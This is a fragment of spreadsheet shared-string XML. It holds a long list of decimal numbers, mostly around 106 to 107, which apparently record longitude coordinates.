  <si>
    <t>106.95264</t>
  </si>
  <si>
    <t>106.92298</t>
  </si>
  <si>
    <t>106.93102</t>
  </si>
  <si>
    <t>106.73010</t>
  </si>
  <si>
    <t>106.57754</t>
  </si>
  <si>
    <t>106.94263</t>
  </si>
  <si>
    <t>106.57727</t>
  </si>
  <si>
    <t>110.76899</t>
  </si>
  <si>
    <t>107.08120</t>
  </si>
  <si>
    <t>107.02155</t>
  </si>
  <si>
    <t>106.77794</t>
  </si>
  <si>
    <t>109.62028</t>
  </si>
  <si>
    <t>106.97981</t>
  </si>
  <si>
    <t>106.78388</t>
  </si>
  <si>
    <t>106.78113</t>
  </si>
  <si>
    <t>107.72661</t>
  </si>
  <si>
    <t>106.71879</t>
  </si>
  <si>
    <t>106.77963</t>
  </si>
  <si>
    <t>106.78210</t>
  </si>
  <si>
    <t>106.80779</t>
  </si>
  <si>
    <t>107.05494</t>
  </si>
  <si>
    <t>106.72974</t>
  </si>
  <si>
    <t>106.78212</t>
  </si>
  <si>
    <t>106.84712</t>
  </si>
  <si>
    <t>106.85004</t>
  </si>
  <si>
    <t>106.87353</t>
  </si>
  <si>
    <t>106.59270</t>
  </si>
  <si>
    <t>112.73427</t>
  </si>
  <si>
    <t>110.69473</t>
  </si>
  <si>
    <t>112.71895</t>
  </si>
  <si>
    <t>106.85978</t>
  </si>
  <si>
    <t>106.77744</t>
  </si>
  <si>
    <t>106.70013</t>
  </si>
  <si>
    <t>109.66018</t>
  </si>
  <si>
    <t>106.70007</t>
  </si>
  <si>
    <t>106.59228</t>
  </si>
  <si>
    <t>107.10402</t>
  </si>
  <si>
    <t>106.76884</t>
  </si>
  <si>
    <t>106.77665</t>
  </si>
  <si>
    <t>106.88191</t>
  </si>
  <si>
    <t>106.82378</t>
  </si>
  <si>
    <t>106.85473</t>
  </si>
  <si>
    <t>106.77821</t>
  </si>
  <si>
    <t>106.83489</t>
  </si>
  <si>
    <t>106.93642</t>
  </si>
  <si>
    <t>106.89432</t>
  </si>
  <si>
    <t>106.86328</t>
  </si>
  <si>
    <t>107.78712</t>
  </si>
  <si>
    <t>106.94099</t>
  </si>
  <si>
    <t>112.65286</t>
  </si>
  <si>
    <t>106.91645</t>
  </si>
  <si>
    <t>107.77350</t>
  </si>
  <si>
    <t>106.89426</t>
  </si>
  <si>
    <t>107.77072</t>
  </si>
  <si>
    <t>107.75491</t>
  </si>
  <si>
    <t>106.80814</t>
  </si>
  <si>
    <t>106.70477</t>
  </si>
  <si>
    <t>106.87011</t>
  </si>
  <si>
    <t>106.70097</t>
  </si>
  <si>
    <t>107.77639</t>
  </si>
  <si>
    <t>106.95797</t>
  </si>
  <si>
    <t>106.69473</t>
  </si>
  <si>
    <t>107.07330</t>
  </si>
  <si>
    <t>106.85295</t>
  </si>
  <si>
    <t>106.95081</t>
  </si>
  <si>
    <t>106.77731</t>
  </si>
  <si>
    <t>106.77674</t>
  </si>
  <si>
    <t>106.57723</t>
  </si>
  <si>
    <t>106.85516</t>
  </si>
  <si>
    <t>106.77841</t>
  </si>
  <si>
    <t>110.66764</t>
  </si>
  <si>
    <t>110.66763</t>
  </si>
  <si>
    <t>106.81578</t>
  </si>
  <si>
    <t>106.88250</t>
  </si>
  <si>
    <t>106.78165</t>
  </si>
  <si>
    <t>110.66570</t>
  </si>
  <si>
    <t>113.70433</t>
  </si>
  <si>
    <t>106.86346</t>
  </si>
  <si>
    <t>122.58699</t>
  </si>
  <si>
    <t>110.38413</t>
  </si>
  <si>
    <t>114.58919</t>
  </si>
  <si>
    <t>106.86828</t>
  </si>
  <si>
    <t>106.85641</t>
  </si>
  <si>
    <t>106.85638</t>
  </si>
  <si>
    <t>106.85642</t>
  </si>
  <si>
    <t>106.78231</t>
  </si>
  <si>
    <t>108.55154</t>
  </si>
  <si>
    <t>106.70485</t>
  </si>
  <si>
    <t>106.94817</t>
  </si>
  <si>
    <t>109.25743</t>
  </si>
  <si>
    <t>110.37277</t>
  </si>
  <si>
    <t>110.30891</t>
  </si>
  <si>
    <t>112.79377</t>
  </si>
  <si>
    <t>108.36326</t>
  </si>
  <si>
    <t>106.78894</t>
  </si>
  <si>
    <t>106.83594</t>
  </si>
  <si>
    <t>122.69570</t>
  </si>
  <si>
    <t>106.69996</t>
  </si>
  <si>
    <t>106.84640</t>
  </si>
  <si>
    <t>106.83826</t>
  </si>
  <si>
    <t>108.41972</t>
  </si>
  <si>
    <t>108.42148</t>
  </si>
  <si>
    <t>106.87768</t>
  </si>
  <si>
    <t>106.82808</t>
  </si>
  <si>
    <t>106.87678</t>
  </si>
  <si>
    <t>106.82635</t>
  </si>
  <si>
    <t>106.82637</t>
  </si>
  <si>
    <t>106.89397</t>
  </si>
  <si>
    <t>106.88187</t>
  </si>
  <si>
    <t>106.96818</t>
  </si>
  <si>
    <t>106.87890</t>
  </si>
  <si>
    <t>119.51044</t>
  </si>
  <si>
    <t>106.85327</t>
  </si>
  <si>
    <t>112.65944</t>
  </si>
  <si>
    <t>106.92109</t>
  </si>
  <si>
    <t>106.73642</t>
  </si>
  <si>
    <t>106.94407</t>
  </si>
  <si>
    <t>106.74733</t>
  </si>
  <si>
    <t>106.82614</t>
  </si>
  <si>
    <t>107.16477</t>
  </si>
  <si>
    <t>106.79715</t>
  </si>
  <si>
    <t>106.97136</t>
  </si>
  <si>
    <t>107.02118</t>
  </si>
  <si>
    <t>106.72214</t>
  </si>
  <si>
    <t>107.04034</t>
  </si>
  <si>
    <t>106.75605</t>
  </si>
  <si>
    <t>107.76302</t>
  </si>
  <si>
    <t>106.83717</t>
  </si>
  <si>
    <t>106.69861</t>
  </si>
  <si>
    <t>106.69862</t>
  </si>
  <si>
    <t>106.70060</t>
  </si>
  <si>
    <t>106.73155</t>
  </si>
  <si>
    <t>108.68158</t>
  </si>
  <si>
    <t>106.72089</t>
  </si>
  <si>
    <t>106.70989</t>
  </si>
  <si>
    <t>106.59344</t>
  </si>
  <si>
    <t>118.25215</t>
  </si>
  <si>
    <t>105.16282</t>
  </si>
  <si>
    <t>106.81057</t>
  </si>
  <si>
    <t>106.80657</t>
  </si>
  <si>
    <t>106.95151</t>
  </si>
  <si>
    <t>106.85777</t>
  </si>
  <si>
    <t>107.58710</t>
  </si>
  <si>
    <t>107.57314</t>
  </si>
  <si>
    <t>107.70976</t>
  </si>
  <si>
    <t>107.63061</t>
  </si>
  <si>
    <t>107.66854</t>
  </si>
  <si>
    <t>107.61262</t>
  </si>
  <si>
    <t>107.57317</t>
  </si>
  <si>
    <t>109.99878</t>
  </si>
  <si>
    <t>107.65597</t>
  </si>
  <si>
    <t>107.70826</t>
  </si>
  <si>
    <t>107.62610</t>
  </si>
  <si>
    <t>107.65234</t>
  </si>
  <si>
    <t>107.63688</t>
  </si>
  <si>
    <t>107.61883</t>
  </si>
  <si>
    <t>107.62404</t>
  </si>
  <si>
    <t>106.94328</t>
  </si>
  <si>
    <t>109.24798</t>
  </si>
  <si>
    <t>106.80713</t>
  </si>
  <si>
    <t>107.62216</t>
  </si>
  <si>
    <t>107.70629</t>
  </si>
  <si>
    <t>106.95325</t>
  </si>
  <si>
    <t>107.68973</t>
  </si>
  <si>
    <t>106.69855</t>
  </si>
  <si>
    <t>107.63106</t>
  </si>
  <si>
    <t>106.93340</t>
  </si>
  <si>
    <t>106.80232</t>
  </si>
  <si>
    <t>106.75726</t>
  </si>
  <si>
    <t>106.89378</t>
  </si>
  <si>
    <t>106.97060</t>
  </si>
  <si>
    <t>106.76815</t>
  </si>
  <si>
    <t>107.57857</t>
  </si>
  <si>
    <t>112.77413</t>
  </si>
  <si>
    <t>107.77372</t>
  </si>
  <si>
    <t>106.86695</t>
  </si>
  <si>
    <t>106.83700</t>
  </si>
  <si>
    <t>106.85574</t>
  </si>
  <si>
    <t>106.85778</t>
  </si>
  <si>
    <t>106.84971</t>
  </si>
  <si>
    <t>106.91829</t>
  </si>
  <si>
    <t>106.90139</t>
  </si>
  <si>
    <t>106.92599</t>
  </si>
  <si>
    <t>106.92596</t>
  </si>
  <si>
    <t>106.81764</t>
  </si>
  <si>
    <t>106.82699</t>
  </si>
  <si>
    <t>106.94807</t>
  </si>
  <si>
    <t>106.75729</t>
  </si>
  <si>
    <t>106.76889</t>
  </si>
  <si>
    <t>106.77123</t>
  </si>
  <si>
    <t>106.95968</t>
  </si>
  <si>
    <t>107.03740</t>
  </si>
  <si>
    <t>106.73625</t>
  </si>
  <si>
    <t>106.73645</t>
  </si>
  <si>
    <t>106.73692</t>
  </si>
  <si>
    <t>106.73834</t>
  </si>
  <si>
    <t>96.84903</t>
  </si>
  <si>
    <t>96.84568</t>
  </si>
  <si>
    <t>106.70073</t>
  </si>
  <si>
    <t>106.75602</t>
  </si>
  <si>
    <t>106.75752</t>
  </si>
  <si>
    <t>106.69625</t>
  </si>
  <si>
    <t>106.84673</t>
  </si>
  <si>
    <t>106.79889</t>
  </si>
  <si>
    <t>106.82194</t>
  </si>
  <si>
    <t>106.75756</t>
  </si>
  <si>
    <t>106.73875</t>
  </si>
  <si>
    <t>106.76380</t>
  </si>
  <si>
    <t>106.85950</t>
  </si>
  <si>
    <t>106.85925</t>
  </si>
  <si>
    <t>106.85938</t>
  </si>
  <si>
    <t>106.87618</t>
  </si>
  <si>
    <t>106.83098</t>
  </si>
  <si>
    <t>106.83264</t>
  </si>
  <si>
    <t>106.82524</t>
  </si>
  <si>
    <t>106.75768</t>
  </si>
  <si>
    <t>106.76370</t>
  </si>
  <si>
    <t>106.38785</t>
  </si>
  <si>
    <t>106.83898</t>
  </si>
  <si>
    <t>106.83923</t>
  </si>
  <si>
    <t>107.58708</t>
  </si>
  <si>
    <t>107.58338</t>
  </si>
  <si>
    <t>106.04073</t>
  </si>
  <si>
    <t>106.05927</t>
  </si>
  <si>
    <t>110.67184</t>
  </si>
  <si>
    <t>95.31635</t>
  </si>
  <si>
    <t>95.32523</t>
  </si>
  <si>
    <t>95.31473</t>
  </si>
  <si>
    <t>96.71166</t>
  </si>
  <si>
    <t>110.11007</t>
  </si>
  <si>
    <t>112.11962</t>
  </si>
  <si>
    <t>106.83227</t>
  </si>
  <si>
    <t>106.84676</t>
  </si>
  <si>
    <t>106.83136</t>
  </si>
  <si>
    <t>106.11527</t>
  </si>
  <si>
    <t>106.84528</t>
  </si>
  <si>
    <t>119.48718</t>
  </si>
  <si>
    <t>107.09702</t>
  </si>
  <si>
    <t>106.97828</t>
  </si>
  <si>
    <t>106.97306</t>
  </si>
  <si>
    <t>107.00462</t>
  </si>
  <si>
    <t>107.00444</t>
  </si>
  <si>
    <t>106.97683</t>
  </si>
  <si>
    <t>106.73690</t>
  </si>
  <si>
    <t>106.57104</t>
  </si>
  <si>
    <t>106.85757</t>
  </si>
  <si>
    <t>106.76933</t>
  </si>
  <si>
    <t>106.76456</t>
  </si>
  <si>
    <t>106.75759</t>
  </si>
  <si>
    <t>110.81504</t>
  </si>
  <si>
    <t>106.73823</t>
  </si>
  <si>
    <t>106.73694</t>
  </si>
  <si>
    <t>106.73819</t>
  </si>
  <si>
    <t>106.73702</t>
  </si>
  <si>
    <t>119.46295</t>
  </si>
  <si>
    <t>117.12293</t>
  </si>
  <si>
    <t>105.21967</t>
  </si>
  <si>
    <t>117.17245</t>
  </si>
  <si>
    <t>117.16787</t>
  </si>
  <si>
    <t>117.15294</t>
  </si>
  <si>
    <t>117.16389</t>
  </si>
  <si>
    <t>117.14630</t>
  </si>
  <si>
    <t>117.16243</t>
  </si>
  <si>
    <t>117.16635</t>
  </si>
  <si>
    <t>117.16748</t>
  </si>
  <si>
    <t>112.79830</t>
  </si>
  <si>
    <t>112.80242</t>
  </si>
  <si>
    <t>112.79578</t>
  </si>
  <si>
    <t>112.76935</t>
  </si>
  <si>
    <t>112.80109</t>
  </si>
  <si>
    <t>112.76240</t>
  </si>
  <si>
    <t>112.72629</t>
  </si>
  <si>
    <t>112.79664</t>
  </si>
  <si>
    <t>113.21810</t>
  </si>
  <si>
    <t>112.78286</t>
  </si>
  <si>
    <t>112.71501</t>
  </si>
  <si>
    <t>112.75947</t>
  </si>
  <si>
    <t>106.82715</t>
  </si>
  <si>
    <t>106.82721</t>
  </si>
  <si>
    <t>116.36180</t>
  </si>
  <si>
    <t>116.00453</t>
  </si>
  <si>
    <t>110.34898</t>
  </si>
  <si>
    <t>115.17473</t>
  </si>
  <si>
    <t>112.20871</t>
  </si>
  <si>
    <t>106.71819</t>
  </si>
  <si>
    <t>106.68614</t>
  </si>
  <si>
    <t>106.83791</t>
  </si>
  <si>
    <t>109.04479</t>
  </si>
  <si>
    <t>106.77190</t>
  </si>
  <si>
    <t>109.68906</t>
  </si>
  <si>
    <t>106.80970</t>
  </si>
  <si>
    <t>106.82822</t>
  </si>
  <si>
    <t>106.77255</t>
  </si>
  <si>
    <t>106.77200</t>
  </si>
  <si>
    <t>106.83218</t>
  </si>
  <si>
    <t>106.77090</t>
  </si>
  <si>
    <t>110.53393</t>
  </si>
  <si>
    <t>110.53493</t>
  </si>
  <si>
    <t>109.68174</t>
  </si>
  <si>
    <t>106.86733</t>
  </si>
  <si>
    <t>107.03824</t>
  </si>
  <si>
    <t>105.25670</t>
  </si>
  <si>
    <t>105.25132</t>
  </si>
  <si>
    <t>123.08374</t>
  </si>
  <si>
    <t>123.03220</t>
  </si>
  <si>
    <t>110.36501</t>
  </si>
  <si>
    <t>119.93225</t>
  </si>
  <si>
    <t>119.93261</t>
  </si>
  <si>
    <t>119.93220</t>
  </si>
  <si>
    <t>119.91330</t>
  </si>
  <si>
    <t>109.67580</t>
  </si>
  <si>
    <t>97.20327</t>
  </si>
  <si>
    <t>106.89464</t>
  </si>
  <si>
    <t>101.40260</t>
  </si>
  <si>
    <t>112.66205</t>
  </si>
  <si>
    <t>110.41285</t>
  </si>
  <si>
    <t>110.89281</t>
  </si>
  <si>
    <t>106.69201</t>
  </si>
  <si>
    <t>110.30089</t>
  </si>
  <si>
    <t>106.89802</t>
  </si>
  <si>
    <t>110.81586</t>
  </si>
  <si>
    <t>102.52401</t>
  </si>
  <si>
    <t>106.85807</t>
  </si>
  <si>
    <t>106.88214</t>
  </si>
  <si>
    <t>106.83434</t>
  </si>
  <si>
    <t>106.82722</t>
  </si>
  <si>
    <t>106.80884</t>
  </si>
  <si>
    <t>108.55988</t>
  </si>
  <si>
    <t>106.85274</t>
  </si>
  <si>
    <t>116.87466</t>
  </si>
  <si>
    <t>123.06034</t>
  </si>
  <si>
    <t>110.41686</t>
  </si>
  <si>
    <t>106.79983</t>
  </si>
  <si>
    <t>109.61039</t>
  </si>
  <si>
    <t>109.61062</t>
  </si>
  <si>
    <t>111.12787</t>
  </si>
  <si>
    <t>110.33500</t>
  </si>
  <si>
    <t>100.34971</t>
  </si>
  <si>
    <t>100.35057</t>
  </si>
  <si>
    <t>100.35009</t>
  </si>
  <si>
    <t>100.40180</t>
  </si>
  <si>
    <t>100.35530</t>
  </si>
  <si>
    <t>114.77710</t>
  </si>
  <si>
    <t>120.33080</t>
  </si>
  <si>
    <t>104.78764</t>
  </si>
  <si>
    <t>120.32547</t>
  </si>
  <si>
    <t>120.25606</t>
  </si>
  <si>
    <t>111.73664</t>
  </si>
  <si>
    <t>106.75552</t>
  </si>
  <si>
    <t>106.77512</t>
  </si>
  <si>
    <t>120.32880</t>
  </si>
  <si>
    <t>120.33047</t>
  </si>
  <si>
    <t>107.71754</t>
  </si>
  <si>
    <t>120.32887</t>
  </si>
  <si>
    <t>120.32530</t>
  </si>
  <si>
    <t>131.25448</t>
  </si>
  <si>
    <t>106.87351</t>
  </si>
  <si>
    <t>106.87347</t>
  </si>
  <si>
    <t>131.25452</t>
  </si>
  <si>
    <t>131.33651</t>
  </si>
  <si>
    <t>106.90020</t>
  </si>
  <si>
    <t>110.36423</t>
  </si>
  <si>
    <t>106.83116</t>
  </si>
  <si>
    <t>106.82037</t>
  </si>
  <si>
    <t>106.82015</t>
  </si>
  <si>
    <t>111.63208</t>
  </si>
  <si>
    <t>119.83737</t>
  </si>
  <si>
    <t>111.50855</t>
  </si>
  <si>
    <t>116.86111</t>
  </si>
  <si>
    <t>116.86833</t>
  </si>
  <si>
    <t>97.46920</t>
  </si>
  <si>
    <t>106.81934</t>
  </si>
  <si>
    <t>108.99195</t>
  </si>
  <si>
    <t>123.37203</t>
  </si>
  <si>
    <t>101.41692</t>
  </si>
  <si>
    <t>106.70054</t>
  </si>
  <si>
    <t>106.84582</t>
  </si>
  <si>
    <t>106.88679</t>
  </si>
  <si>
    <t>98.70285</t>
  </si>
  <si>
    <t>98.69365</t>
  </si>
  <si>
    <t>106.81162</t>
  </si>
  <si>
    <t>106.85983</t>
  </si>
  <si>
    <t>106.72982</t>
  </si>
  <si>
    <t>106.85563</t>
  </si>
  <si>
    <t>106.87293</t>
  </si>
  <si>
    <t>106.92793</t>
  </si>
  <si>
    <t>106.83361</t>
  </si>
  <si>
    <t>106.86865</t>
  </si>
  <si>
    <t>107.70751</t>
  </si>
  <si>
    <t>106.93781</t>
  </si>
  <si>
    <t>106.81426</t>
  </si>
  <si>
    <t>106.70293</t>
  </si>
  <si>
    <t>106.93787</t>
  </si>
  <si>
    <t>106.80105</t>
  </si>
  <si>
    <t>106.92738</t>
  </si>
  <si>
    <t>106.76526</t>
  </si>
  <si>
    <t>106.70750</t>
  </si>
  <si>
    <t>106.92944</t>
  </si>
  <si>
    <t>106.69774</t>
  </si>
  <si>
    <t>112.57793</t>
  </si>
  <si>
    <t>107.55734</t>
  </si>
  <si>
    <t>111.73626</t>
  </si>
  <si>
    <t>106.83447</t>
  </si>
  <si>
    <t>109.32723</t>
  </si>
  <si>
    <t>109.32721</t>
  </si>
  <si>
    <t>106.87437</t>
  </si>
  <si>
    <t>106.81286</t>
  </si>
  <si>
    <t>106.78816</t>
  </si>
  <si>
    <t>106.77040</t>
  </si>
  <si>
    <t>112.93701</t>
  </si>
  <si>
    <t>106.77136</t>
  </si>
  <si>
    <t>106.81398</t>
  </si>
  <si>
    <t>106.87725</t>
  </si>
  <si>
    <t>106.87492</t>
  </si>
  <si>
    <t>114.77760</t>
  </si>
  <si>
    <t>106.77796</t>
  </si>
  <si>
    <t>106.76980</t>
  </si>
  <si>
    <t>106.78676</t>
  </si>
  <si>
    <t>106.78768</t>
  </si>
  <si>
    <t>106.78213</t>
  </si>
  <si>
    <t>106.78815</t>
  </si>
  <si>
    <t>106.78104</t>
  </si>
  <si>
    <t>106.67641</t>
  </si>
  <si>
    <t>106.76758</t>
  </si>
  <si>
    <t>106.76923</t>
  </si>
  <si>
    <t>106.75394</t>
  </si>
  <si>
    <t>106.79312</t>
  </si>
  <si>
    <t>106.75651</t>
  </si>
  <si>
    <t>106.71573</t>
  </si>
  <si>
    <t>106.76512</t>
  </si>
  <si>
    <t>106.73438</t>
  </si>
  <si>
    <t>106.74630</t>
  </si>
  <si>
    <t>106.76296</t>
  </si>
  <si>
    <t>106.78736</t>
  </si>
  <si>
    <t>106.77580</t>
  </si>
  <si>
    <t>106.77873</t>
  </si>
  <si>
    <t>106.77883</t>
  </si>
  <si>
    <t>106.78667</t>
  </si>
  <si>
    <t>106.78985</t>
  </si>
  <si>
    <t>106.77766</t>
  </si>
  <si>
    <t>106.86809</t>
  </si>
  <si>
    <t>106.74982</t>
  </si>
  <si>
    <t>110.53420</t>
  </si>
  <si>
    <t>106.77422</t>
  </si>
  <si>
    <t>106.77761</t>
  </si>
  <si>
    <t>106.77594</t>
  </si>
  <si>
    <t>106.77036</t>
  </si>
  <si>
    <t>106.77027</t>
  </si>
  <si>
    <t>106.77333</t>
  </si>
  <si>
    <t>101.43493</t>
  </si>
  <si>
    <t>106.77416</t>
  </si>
  <si>
    <t>106.71716</t>
  </si>
  <si>
    <t>106.78064</t>
  </si>
  <si>
    <t>106.72990</t>
  </si>
  <si>
    <t>106.72991</t>
  </si>
  <si>
    <t>106.82251</t>
  </si>
  <si>
    <t>106.82236</t>
  </si>
  <si>
    <t>100.57489</t>
  </si>
  <si>
    <t>106.89749</t>
  </si>
  <si>
    <t>101.42046</t>
  </si>
  <si>
    <t>106.79000</t>
  </si>
  <si>
    <t>106.52635</t>
  </si>
  <si>
    <t>98.63755</t>
  </si>
  <si>
    <t>106.60184</t>
  </si>
  <si>
    <t>111.51334</t>
  </si>
  <si>
    <t>128.17801</t>
  </si>
  <si>
    <t>107.04561</t>
  </si>
  <si>
    <t>107.04565</t>
  </si>
  <si>
    <t>106.89365</t>
  </si>
  <si>
    <t>106.89346</t>
  </si>
  <si>
    <t>106.80927</t>
  </si>
  <si>
    <t>106.83492</t>
  </si>
  <si>
    <t>106.83497</t>
  </si>
  <si>
    <t>106.79429</t>
  </si>
  <si>
    <t>106.80726</t>
  </si>
  <si>
    <t>106.81028</t>
  </si>
  <si>
    <t>106.83495</t>
  </si>
  <si>
    <t>106.75967</t>
  </si>
  <si>
    <t>106.81411</t>
  </si>
  <si>
    <t>106.86654</t>
  </si>
  <si>
    <t>106.76823</t>
  </si>
  <si>
    <t>106.76833</t>
  </si>
  <si>
    <t>106.76801</t>
  </si>
  <si>
    <t>106.80881</t>
  </si>
  <si>
    <t>106.77312</t>
  </si>
  <si>
    <t>119.06699</t>
  </si>
  <si>
    <t>110.41116</t>
  </si>
  <si>
    <t>106.83322</t>
  </si>
  <si>
    <t>106.90220</t>
  </si>
  <si>
    <t>106.85920</t>
  </si>
  <si>
    <t>106.89035</t>
  </si>
  <si>
    <t>106.89041</t>
  </si>
  <si>
    <t>106.89050</t>
  </si>
  <si>
    <t>106.77397</t>
  </si>
  <si>
    <t>106.78924</t>
  </si>
  <si>
    <t>106.86788</t>
  </si>
  <si>
    <t>106.76037</t>
  </si>
  <si>
    <t>106.87393</t>
  </si>
  <si>
    <t>106.87361</t>
  </si>
  <si>
    <t>106.78655</t>
  </si>
  <si>
    <t>106.89046</t>
  </si>
  <si>
    <t>106.74433</t>
  </si>
  <si>
    <t>106.90245</t>
  </si>
  <si>
    <t>111.51333</t>
  </si>
  <si>
    <t>106.87525</t>
  </si>
  <si>
    <t>106.89377</t>
  </si>
  <si>
    <t>106.81389</t>
  </si>
  <si>
    <t>106.90686</t>
  </si>
  <si>
    <t>106.75141</t>
  </si>
  <si>
    <t>106.88162</t>
  </si>
  <si>
    <t>106.88992</t>
  </si>
  <si>
    <t>107.73165</t>
  </si>
  <si>
    <t>106.87742</t>
  </si>
  <si>
    <t>106.77120</t>
  </si>
  <si>
    <t>106.90729</t>
  </si>
  <si>
    <t>106.78102</t>
  </si>
  <si>
    <t>106.76927</t>
  </si>
  <si>
    <t>106.77960</t>
  </si>
  <si>
    <t>106.75993</t>
  </si>
  <si>
    <t>106.76930</t>
  </si>
  <si>
    <t>106.77029</t>
  </si>
  <si>
    <t>106.77059</t>
  </si>
  <si>
    <t>106.77116</t>
  </si>
  <si>
    <t>112.93368</t>
  </si>
  <si>
    <t>124.87717</t>
  </si>
  <si>
    <t>101.44081</t>
  </si>
  <si>
    <t>106.77425</t>
  </si>
  <si>
    <t>106.77395</t>
  </si>
  <si>
    <t>108.61990</t>
  </si>
  <si>
    <t>106.76826</t>
  </si>
  <si>
    <t>105.27781</t>
  </si>
  <si>
    <t>106.92398</t>
  </si>
  <si>
    <t>107.77349</t>
  </si>
  <si>
    <t>107.77660</t>
  </si>
  <si>
    <t>106.97228</t>
  </si>
  <si>
    <t>106.97730</t>
  </si>
  <si>
    <t>106.96999</t>
  </si>
  <si>
    <t>106.97435</t>
  </si>
  <si>
    <t>107.04382</t>
  </si>
  <si>
    <t>106.86714</t>
  </si>
  <si>
    <t>107.60583</t>
  </si>
  <si>
    <t>106.87446</t>
  </si>
  <si>
    <t>106.94411</t>
  </si>
  <si>
    <t>106.87513</t>
  </si>
  <si>
    <t>106.87551</t>
  </si>
  <si>
    <t>109.52069</t>
  </si>
  <si>
    <t>106.79497</t>
  </si>
  <si>
    <t>108.62134</t>
  </si>
  <si>
    <t>100.36750</t>
  </si>
  <si>
    <t>107.77669</t>
  </si>
  <si>
    <t>106.55818</t>
  </si>
  <si>
    <t>109.25509</t>
  </si>
  <si>
    <t>107.62369</t>
  </si>
  <si>
    <t>112.70068</t>
  </si>
  <si>
    <t>107.17540</t>
  </si>
  <si>
    <t>112.70054</t>
  </si>
  <si>
    <t>108.69280</t>
  </si>
  <si>
    <t>106.77545</t>
  </si>
  <si>
    <t>106.79395</t>
  </si>
  <si>
    <t>106.83608</t>
  </si>
  <si>
    <t>106.86379</t>
  </si>
  <si>
    <t>106.83249</t>
  </si>
  <si>
    <t>107.11078</t>
  </si>
  <si>
    <t>106.83479</t>
  </si>
  <si>
    <t>110.24811</t>
  </si>
  <si>
    <t>106.76737</t>
  </si>
  <si>
    <t>107.59256</t>
  </si>
  <si>
    <t>120.32413</t>
  </si>
  <si>
    <t>101.43134</t>
  </si>
  <si>
    <t>98.77214</t>
  </si>
  <si>
    <t>109.70168</t>
  </si>
  <si>
    <t>106.79582</t>
  </si>
  <si>
    <t>106.71181</t>
  </si>
  <si>
    <t>106.84522</t>
  </si>
  <si>
    <t>112.02248</t>
  </si>
  <si>
    <t>114.37755</t>
  </si>
  <si>
    <t>106.71130</t>
  </si>
  <si>
    <t>108.76686</t>
  </si>
  <si>
    <t>106.77528</t>
  </si>
  <si>
    <t>108.78843</t>
  </si>
  <si>
    <t>114.35311</t>
  </si>
  <si>
    <t>106.58306</t>
  </si>
  <si>
    <t>106.74839</t>
  </si>
  <si>
    <t>106.77601</t>
  </si>
  <si>
    <t>117.16916</t>
  </si>
  <si>
    <t>110.31187</t>
  </si>
  <si>
    <t>106.05394</t>
  </si>
  <si>
    <t>106.04373</t>
  </si>
  <si>
    <t>106.04368</t>
  </si>
  <si>
    <t>106.06804</t>
  </si>
  <si>
    <t>109.03420</t>
  </si>
  <si>
    <t>106.82719</t>
  </si>
  <si>
    <t>98.60468</t>
  </si>
  <si>
    <t>98.68252</t>
  </si>
  <si>
    <t>98.62127</t>
  </si>
  <si>
    <t>106.83966</t>
  </si>
  <si>
    <t>98.61955</t>
  </si>
  <si>
    <t>112.74659</t>
  </si>
  <si>
    <t>106.97214</t>
  </si>
  <si>
    <t>106.96657</t>
  </si>
  <si>
    <t>106.93825</t>
  </si>
  <si>
    <t>106.94033</t>
  </si>
  <si>
    <t>106.94306</t>
  </si>
  <si>
    <t>108.32062</t>
  </si>
  <si>
    <t>97.07772</t>
  </si>
  <si>
    <t>97.32354</t>
  </si>
  <si>
    <t>114.61857</t>
  </si>
  <si>
    <t>106.87299</t>
  </si>
  <si>
    <t>110.46263</t>
  </si>
  <si>
    <t>97.76817</t>
  </si>
  <si>
    <t>97.35050</t>
  </si>
  <si>
    <t>106.69183</t>
  </si>
  <si>
    <t>107.16612</t>
  </si>
  <si>
    <t>106.86991</t>
  </si>
  <si>
    <t>113.11442</t>
  </si>
  <si>
    <t>113.25112</t>
  </si>
  <si>
    <t>107.79564</t>
  </si>
  <si>
    <t>107.51132</t>
  </si>
  <si>
    <t>107.51122</t>
  </si>
  <si>
    <t>112.49155</t>
  </si>
  <si>
    <t>111.49088</t>
  </si>
  <si>
    <t>112.49983</t>
  </si>
  <si>
    <t>112.48972</t>
  </si>
  <si>
    <t>110.85630</t>
  </si>
  <si>
    <t>97.14522</t>
  </si>
  <si>
    <t>106.85568</t>
  </si>
  <si>
    <t>106.85558</t>
  </si>
  <si>
    <t>106.85570</t>
  </si>
  <si>
    <t>97.14543</t>
  </si>
  <si>
    <t>113.47868</t>
  </si>
  <si>
    <t>119.43938</t>
  </si>
  <si>
    <t>119.49820</t>
  </si>
  <si>
    <t>119.49800</t>
  </si>
  <si>
    <t>106.83345</t>
  </si>
  <si>
    <t>119.48859</t>
  </si>
  <si>
    <t>108.51180</t>
  </si>
  <si>
    <t>107.58841</t>
  </si>
  <si>
    <t>107.58544</t>
  </si>
  <si>
    <t>107.71176</t>
  </si>
  <si>
    <t>106.82237</t>
  </si>
  <si>
    <t>112.48914</t>
  </si>
  <si>
    <t>112.65890</t>
  </si>
  <si>
    <t>112.73049</t>
  </si>
  <si>
    <t>112.71041</t>
  </si>
  <si>
    <t>112.54983</t>
  </si>
  <si>
    <t>108.37974</t>
  </si>
  <si>
    <t>112.76377</t>
  </si>
  <si>
    <t>103.56824</t>
  </si>
  <si>
    <t>112.55938</t>
  </si>
  <si>
    <t>110.34493</t>
  </si>
  <si>
    <t>112.58008</t>
  </si>
  <si>
    <t>106.72547</t>
  </si>
  <si>
    <t>112.00148</t>
  </si>
  <si>
    <t>112.77219</t>
  </si>
  <si>
    <t>112.38965</t>
  </si>
  <si>
    <t>112.54701</t>
  </si>
  <si>
    <t>112.77715</t>
  </si>
  <si>
    <t>112.76634</t>
  </si>
  <si>
    <t>112.01354</t>
  </si>
  <si>
    <t>112.02501</t>
  </si>
  <si>
    <t>110.29255</t>
  </si>
  <si>
    <t>104.59905</t>
  </si>
  <si>
    <t>106.86289</t>
  </si>
  <si>
    <t>106.93936</t>
  </si>
  <si>
    <t>107.54980</t>
  </si>
  <si>
    <t>112.34619</t>
  </si>
  <si>
    <t>113.48262</t>
  </si>
  <si>
    <t>114.70190</t>
  </si>
  <si>
    <t>112.39121</t>
  </si>
  <si>
    <t>112.39001</t>
  </si>
  <si>
    <t>100.65708</t>
  </si>
  <si>
    <t>107.82714</t>
  </si>
  <si>
    <t>112.64253</t>
  </si>
  <si>
    <t>114.93672</t>
  </si>
  <si>
    <t>106.76959</t>
  </si>
  <si>
    <t>114.85346</t>
  </si>
  <si>
    <t>112.38200</t>
  </si>
  <si>
    <t>114.84409</t>
  </si>
  <si>
    <t>104.46458</t>
  </si>
  <si>
    <t>106.82810</t>
  </si>
  <si>
    <t>114.76620</t>
  </si>
  <si>
    <t>114.60051</t>
